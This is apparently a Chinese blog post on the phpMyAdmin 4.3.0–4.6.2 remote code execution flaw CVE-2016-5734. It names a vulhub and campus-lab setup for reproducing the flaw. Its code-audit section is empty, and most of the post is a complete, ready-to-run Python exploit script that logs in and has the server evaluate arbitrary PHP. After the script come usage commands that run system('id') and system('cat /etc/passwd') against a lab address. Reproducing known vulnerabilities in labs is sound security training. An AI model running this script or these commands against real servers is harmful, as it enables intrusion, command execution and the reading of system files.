简介

环境复现:https://github.com/vulhub/vulhub

线上平台:榆林学院内可使用协会内部的网络安全实验平台

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。

影响版本

phpmyadmin4.3.0-4.6.2

代码审计

待更新....

漏洞利用

漏洞利用py

#!/usr/bin/env python

"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit

Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.

CVE: CVE-2016-5734

Author: https://twitter.com/iamsecurity

run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"

"""

import requests

import argparse

import sys

__author__ = "@iamsecurity"

if __name__ == '__main__':

    parser = argparse.ArgumentParser()

    parser.add_argument("url", type=str, help="URL with path to PMA")

    parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")

    parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")

    parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")

    parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")

    parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")

    arguments = parser.parse_args()

    url_to_pma = arguments.url

    uname = arguments.user

    upass = arguments.pwd

    if arguments.dbs:

        db = arguments.dbs

    else:

        db = "test"

    token = False

    custom_table = False

    if arguments.table:

        custom_table = True

        table = arguments.table

    else:

        table = "prgpwn"

    if arguments.cmd:

        payload = arguments.cmd

    else:

        payload = "system('uname -a');"

    size = 32

    s = requests.Session()

    # you can manually add proxy support it's very simple ;)

    # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}

    s.verify = False

    sql = '''CREATE TABLE `{0}` (

      `first` varchar(10) CHARACTER SET utf8 NOT NULL

    ) ENGINE=InnoDB DEFAULT CHARSET=latin1;

    INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));

    '''.format(table)

    # get_token

    resp = s.post(url_to_pma + "/?lang=en", dict(

        pma_username=uname,

        pma_password=upass

    ))

    if resp.status_code is 200:

        token_place = resp.text.find("token=") + 6

        token = resp.text[token_place:token_place + 32]

    if token is False:

        print("Cannot get valid authorization token.")

        sys.exit(1)

    if custom_table is False:

        data = {

            "is_js_confirmed": "0",

            "db": db,

            "token": token,

            "pos": "0",

            "sql_query": sql,

            "sql_delimiter": ";",

            "show_query": "0",

            "fk_checks": "0",

            "SQL": "Go",

            "ajax_request": "true",

            "ajax_page_request": "true",

        }

        resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))

        if resp.status_code == 200:

            if "success" in resp.json():

                if resp.json()["success"] is False:

                    first = resp.json()["error"][resp.json()["error"].find("<code>")+6:]

                    error = first[:first.find("</code>")]

                    if "already exists" in error:

                        print(error)

                    else:

                        print("ERROR: " + error)

                        sys.exit(1)

    # build exploit

    exploit = {

        "db": db,

        "table": table,

        "token": token,

        "goto": "sql.php",

        "find": "0/e\0",

        "replaceWith": payload,

        "columnIndex": "0",

        "useRegex": "on",

        "submit": "Go",

        "ajax_request": "true"

    }

    resp = s.post(

        url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)

    )

    if resp.status_code == 200:

        result = resp.json()["message"][resp.json()["message"].find("</a>")+8:]

        if len(result):

            print("result: " + result)

            sys.exit(0)

        print(

            "Exploit failed!\n"

            "Try to manually set exploit parameters like --table, --database and --token.\n"

            "Remember that servers with PHP version greater than 5.4.6"

            " is not exploitable, because of warning about null byte in regexp"

        )

        sys.exit(1)
python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system('id')"
python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system('cat /etc/passwd')"

phpmyadmin远程代码执行漏洞(CVE-2016-5734)的更多相关文章

  1. Apache Struts 远程代码执行漏洞(CVE-2013-4316)

    漏洞版本: Apache Group Struts < 2.3.15.2 漏洞描述: BUGTRAQ ID: 62587 CVE(CAN) ID: CVE-2013-4316 Struts2 是 ...

  2. MongoDB ‘conn’Mongo 对象远程代码执行漏洞

    漏洞名称: MongoDB ‘conn’Mongo 对象远程代码执行漏洞 CNNVD编号: CNNVD-201307-497 发布时间: 2013-07-25 更新时间: 2013-07-25 危害等 ...

  3. Struts2再爆远程代码执行漏洞

    Struts又爆远程代码执行漏洞!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码.Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction ...

  4. 【漏洞公告】CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞

    2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定 ...

  5. 隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)

    Preface 这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下. 利用脚本Github传送地址 ,后面的参考链接 ...

  6. phpcms2008远程代码执行漏洞

    phpcms2008远程代码执行漏洞 描述: 近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127).攻击者利用该漏洞,可在未授权的情况下实现对网站文件的写入.该漏洞危害程度 ...

  7. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

  8. 【漏洞复现】Tomcat CVE-2017-12615 远程代码执行漏洞

    漏洞描述 [漏洞预警]Tomcat CVE-2017-12615远程代码执行漏洞/CVE-2017-12616信息泄漏 https://www.secfree.com/article-395.html ...

  9. Office CVE-2017-8570远程代码执行漏洞复现

    实验环境 操作机:Kali Linux IP:172.16.11.2 目标机:windows7 x64 IP:172.16.12.2 实验目的 掌握漏洞的利用方法 实验工具 Metaspliot:它是 ...

随机推荐

  1. flask生产环境部署

    1.安装uwsgipip install uwsgi 2.创建ini配置文件vim uwsgi.ini内容如下:[uwsgi]# 配置启动的服务地址和iphttp=0.0.0.0:5001# 项目目录 ...

  2. Solr6.4.2异常:org.apache.solr.common.SolrException: Error opening new searcher

    版权声明:本文为博主原创文章,转载请附上原文出处链接和本声明. 原文链接:https://www.cnblogs.com/chenghu/p/13840021.html Solr版本6.4.2 启动S ...

  3. HTML 5标签中<button>的新属性

    <button> 标签HTML5 中的新属性 属性 值 描述 autofocus autofocus 规定当页面加载时按钮应当自动地获得焦点. disabled disabled 规定应该 ...

  4. CentOS 8 关闭防火墙

    SELINUX=disabled vim /etc/selinux/config systemctl disable firewalld.service

  5. 经典剪枝算法的例题——Sticks详细注释版

    这题听说是道十分经典的剪枝算的题目,不要问我剪枝是什么,我也不知道,反正我只知道用到了深度搜索 我参考了好多资料才悟懂,然后我发现网上的那些大神原理讲的很明白,但代码没多少注释,看的很懵X,于是我抄起 ...

  6. Redis【一】 RESP协议

    https://redis.io/topics/protocol RESP:redis序列化协议 client-server交流 二进制安全的 网络层 client端建立tcp连接到Server po ...

  7. 01 . Go框架之Gin框架从入门到熟悉(路由和上传文件)

    Gin框架简介 Gin是使用Go/Golang语言实现的HTTP Web框架, 接口简洁, 性能极高,截止1.4.0版本,包含测试代码,仅14K, 其中测试代码9K, 也就是说测试源码仅5k左右, 具 ...

  8. 给 Mac 添加右键菜单「使用 VSCode 打开」

    最终的实现效果是在文件 / 文件夹上右击时,会出现菜单项「用 VSCode 打开」,点击后会启动 Visual Studio Code 打开对应的文件 / 文件夹. 实现步骤 打开「自动操作.app」 ...

  9. EXCEL计数时间差--分钟数

  10. PLC模拟量输入和数字量输入是什么

    数字信号输入输出: 就是开关闭合,断开. 模拟量输入输出: 就是一个数值.比如:液位1.5米,温度30度,这样的数. 输入单元 输入单元是PLC与被控设备相连的输入接口,是信号进入PLC的桥梁,它的作 ...